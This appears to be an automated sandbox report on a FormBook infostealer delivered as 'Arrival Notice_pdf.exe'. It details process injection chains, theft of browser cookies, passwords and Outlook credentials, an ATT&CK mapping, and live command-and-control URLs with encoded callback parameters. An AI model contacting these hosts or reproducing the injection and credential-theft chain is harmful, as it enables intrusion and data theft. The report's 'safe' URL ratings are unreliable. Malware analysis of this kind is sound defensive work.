Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtTerminateProcess: Direct from: 0x76F02D5C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\ktmutil.exe

Thread register set: target process: 8092

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\ktmutil.exe

Thread APC queued: target process: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 30D4008

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0027B106 LogonUserW,

0_2_0027B106

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00243D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00243D19

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0028411C SendInput,keybd_event,

0_2_0028411C

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_002874BB mouse_event,

0_2_002874BB

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice_pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"	Jump to behavior
Source: C:\Program Files (x86)\aGLggtNWfCsYlPuvHbKcbwUgSBnlSNjggLOtfacRmHzPJUdxlz\FMQUqumqqHn.exe	Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

0_2_0027A66C

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_002871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_002871FA

Source: Arrival Notice_pdf.exe, FMQUqumqqHn.exe, 00000005.00000002.3007303725.0000000001231000.00000002.00000001.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000005.00000000.2031053641.0000000001230000.00000002.00000001.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2191849533.0000000001181000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: FMQUqumqqHn.exe, 00000005.00000002.3007303725.0000000001231000.00000002.00000001.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000005.00000000.2031053641.0000000001230000.00000002.00000001.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2191849533.0000000001181000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: Arrival Notice_pdf.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: FMQUqumqqHn.exe, 00000005.00000002.3007303725.0000000001231000.00000002.00000001.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000005.00000000.2031053641.0000000001230000.00000002.00000001.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2191849533.0000000001181000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: FMQUqumqqHn.exe, 00000005.00000002.3007303725.0000000001231000.00000002.00000001.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000005.00000000.2031053641.0000000001230000.00000002.00000001.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000000.2191849533.0000000001181000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_002665C4 cpuid

0_2_002665C4

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0029091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0029091D

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_002BB340 GetUserNameW,

0_2_002BB340

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_00271E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00271E8E

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe

Code function: 0_2_0025DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0025DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3007895884.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109435609.00000000039B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3007811808.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109156869.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3006361628.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3009849528.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3007851099.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109766893.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\ktmutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Arrival Notice_pdf.exe	Binary or memory string: WIN_81
Source: Arrival Notice_pdf.exe	Binary or memory string: WIN_XP
Source: Arrival Notice_pdf.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: Arrival Notice_pdf.exe	Binary or memory string: WIN_XPe
Source: Arrival Notice_pdf.exe	Binary or memory string: WIN_VISTA
Source: Arrival Notice_pdf.exe	Binary or memory string: WIN_7
Source: Arrival Notice_pdf.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3007895884.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109435609.00000000039B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3007811808.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109156869.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3006361628.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3009849528.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3007851099.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2109766893.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_00298C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00298C4F
Source: C:\Users\user\Desktop\Arrival Notice_pdf.exe	Code function: 0_2_0029923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0029923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Arrival Notice_pdf.exe	26%	ReversingLabs	Win32.Trojan.AutoitInject
Arrival Notice_pdf.exe	22%	Virustotal		Browse
Arrival Notice_pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
mcfunding.org	0%	Virustotal	Browse
beingandbecoming.ltd	0%	Virustotal	Browse
migorengya8.click	0%	Virustotal	Browse
www.futurevision.life	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.migorengya8.click/y3dc/	0%	Avira URL Cloud	safe
http://www.mcfunding.org/0598/	0%	Avira URL Cloud	safe
http://www.migorengya8.click/y3dc/?XRWLl=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&p2J=sbJxX	0%	Avira URL Cloud	safe
http://www.migorengya8.click	0%	Avira URL Cloud	safe
http://www.huiguang.xyz/hv6g/?p2J=sbJxX&XRWLl=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM=	0%	Avira URL Cloud	safe
http://www.mcfunding.org/0598/?XRWLl=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&p2J=sbJxX	0%	Avira URL Cloud	safe
http://www.futurevision.life/hxmz/	0%	Avira URL Cloud	safe
http://www.futurevision.life/hxmz/?p2J=sbJxX&XRWLl=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=	0%	Avira URL Cloud	safe
http://www.beingandbecoming.ltd/79tr/	0%	Avira URL Cloud	safe
http://www.beingandbecoming.ltd/79tr/?XRWLl=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&p2J=sbJxX	0%	Avira URL Cloud	safe
https://34.92.79.175:19817/register	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mcfunding.org	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.huiguang.xyz	154.92.61.37	true	false		high
beingandbecoming.ltd	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
migorengya8.click	198.252.98.54	true	true	0%, Virustotal, Browse	unknown
www.futurevision.life	203.161.49.193	true	true	0%, Virustotal, Browse	unknown
schedulemassage.xyz	3.33.130.190	true	true		unknown
www.beingandbecoming.ltd	unknown	unknown	false		unknown
www.migorengya8.click	unknown	unknown	false		unknown
www.mcfunding.org	unknown	unknown	false		unknown
www.schedulemassage.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.huiguang.xyz/hv6g/?p2J=sbJxX&XRWLl=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM=	true	Avira URL Cloud: safe	unknown
http://www.migorengya8.click/y3dc/	true	Avira URL Cloud: safe	unknown
http://www.mcfunding.org/0598/?XRWLl=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&p2J=sbJxX	true	Avira URL Cloud: safe	unknown
http://www.migorengya8.click/y3dc/?XRWLl=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&p2J=sbJxX	true	Avira URL Cloud: safe	unknown
http://www.mcfunding.org/0598/	true	Avira URL Cloud: safe	unknown
http://www.futurevision.life/hxmz/	true	Avira URL Cloud: safe	unknown
http://www.beingandbecoming.ltd/79tr/?XRWLl=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&p2J=sbJxX	true	Avira URL Cloud: safe	unknown
http://www.futurevision.life/hxmz/?p2J=sbJxX&XRWLl=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=	true	Avira URL Cloud: safe	unknown
http://www.beingandbecoming.ltd/79tr/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.migorengya8.click	FMQUqumqqHn.exe, 00000008.00000002.3009849528.0000000004F69000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	ktmutil.exe, 00000007.00000002.3010903578.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://hm.baidu.com/hm.js?874f82fc659e5acd8a958bbf89041d1f	ktmutil.exe, 00000007.00000002.3009265180.0000000004594000.00000004.10000000.00040000.00000000.sdmp, FMQUqumqqHn.exe, 00000008.00000002.3008268012.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2439887561.00000000388F4000.00000004.80000000.00040000.00000000.sdmp	false		high
